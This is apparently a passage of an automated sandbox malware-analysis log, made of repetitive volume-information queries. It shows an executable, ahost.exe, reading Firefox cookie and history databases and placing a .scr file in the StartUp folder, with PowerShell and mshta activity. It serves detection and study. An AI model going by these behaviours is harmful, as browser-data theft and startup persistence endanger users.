Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI72722\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\Desktop\ahost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
